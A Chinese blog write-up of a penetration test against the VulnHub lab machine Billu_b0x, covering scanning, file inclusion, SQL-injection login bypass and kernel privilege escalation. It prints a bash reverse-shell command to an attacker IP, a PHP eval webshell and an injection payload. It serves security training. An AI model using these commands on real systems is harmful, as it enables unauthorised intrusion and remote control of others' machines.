vulnhub靶机渗透 Billu_b0x

Billu_b0x靶机入侵笔记

1、环境搭建

下载地址:https://download.vulnhub.com/billu/Billu_b0x.zip

​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里连接到虚拟网卡1。

2、信息收集

  • 主机发现

    使用nmap进行主机探测(-sP参数也可):nmap -sn 192.168.110.1/24

在这里插入图片描述

192.168.110.132,为靶机ip,也可以使用Kali中的arp-scan工具扫描:arp-scan 192.168.110.1/24

  • 端口扫描

    使用nmap扫描端口,并做服务识别和深度扫描(加-A参数):nmap -v -A 192.168.110.132
    在这里插入图片描述

    目标开启了22和80端口

  • web端信息收集

在这里插入图片描述

网站使用Apache和php搭建

3、漏洞探测

  • 尝试SQL注入

    一般靶场都是从web端突破

    在这里插入图片描述

    网页提示SQL注入是突破口

    使用万能密码admin' or 'a'='a -- 密码随意,发现无法注入,出现js弹框Try again

    使用sqlmap注入失败。暂时先不fuzz注入,继续寻找其他突破口。

  • 目录扫描

    使用dirsearch进行目录扫描

    在这里插入图片描述

    发现很多目录好文件挨个访问

  • 尝试文件上传

    访问发现add.php是一个文件上传页面,无论上传什么文件都提示选择图片上传,哪怕是上传的图片,推测应该是后端没做相应处理,用来干扰的空壳文件

在这里插入图片描述

  • 文件包含收集信息

    继续访问扫到的目录,在in.php发现phpinfo页面,发现开启了allow_url_fopen,那么应该存在文件包含

在这里插入图片描述

继续浏览其他目录,发现phpMyAdmin页面和可以文件包含的test.php

在这里插入图片描述
在这里插入图片描述

尝试包含/etc/passwd文件,GET方法无法访问,使用POST成功下载passwd文件。查看passwd文件,发现1个id 1000的账号ica,ssh连接的用户名可以是ica或root

在这里插入图片描述

继续包含文件,为了方便查看使用burp。查看index.php,发现包含一个没扫到的c.php文件

在这里插入图片描述

审计index.php

在这里插入图片描述

str_replace的作用是将字符串\’ 替换为空,因此构造SQL注入登录payload时,必须含有\’字符串,否则会报错。urldecode的作用是将输入解码。

常用的注入登陆的绕过语句是 'or 1=1 --,而又必须含有\' ,则有'or 1=1 -- \'

登陆账号 'or 1=1 -- \'
登陆密码 'or 1=1 -- \'

先不做测试,接着往下看(后面经过测试确实可以绕过)

接着查看c.php文件,发现一个数据库的账密billu/b0x_billu

在这里插入图片描述

尝试使用账号登录phpmyadmin,在数据库中找到一个账号和密码。猜测可能是网站用户的,先记下:biLLu/hEx_it

在这里插入图片描述

  • getshell方法一

    phpmyadmin的默认的配置文件是:config.inc.php。需要猜测路径,通过URL猜测路径默认在/var/www/phpmy下面,获得账密root/roottoor

在这里插入图片描述

使用root用户ssh成功登录,一步到位

  • getshell方法二(需提权)

    网页登录,进入主页发现有显示用户和添加用户,且添加用户可上传头像,头像图片保存在/uploaded_images/目录

    利用文件包含审计panel.php文件,白名单限制,只能上传图片一类文件。

在这里插入图片描述

此外还发现panel.php存在文件包含

在这里插入图片描述

从/uploaded_images/下载一张图片,构造图片木马上传

在这里插入图片描述

使用panel.php或者test.php进行包含

在这里插入图片描述

成功上传

在这里插入图片描述

文件包含
在这里插入图片描述
在这里插入图片描述

执行命令

在这里插入图片描述

用bash反弹shell

命令:echo “bash -i >& /dev/tcp/192.168.110.128/10086 0>&1” | bash

需要将命令url编码

在这里插入图片描述

文件上传目录uploaded_images为写权限目录,进入该目录,写一个webshell,使用蚁剑连接方便文件操作,执行命令

echo '<?php @eval($_POST['cmd']);?>' >> uploaded_images/shell.php

成功连接

在这里插入图片描述

4、权限提升

  • sudo -l 、find提权失败

  • 查看内核、系统版本,寻找提权exp

    查看系统内核版本,命令uname -acat /etc/issue

在这里插入图片描述

在searchsploit(漏洞数据库)中搜索这个系统版本的漏洞
searchsploit Ubuntu 12.04

在这里插入图片描述

将exp拷贝下来,利用蚁剑上传,赋予执行权限,编译gcc 37292.c -o exp

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

提权成功

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值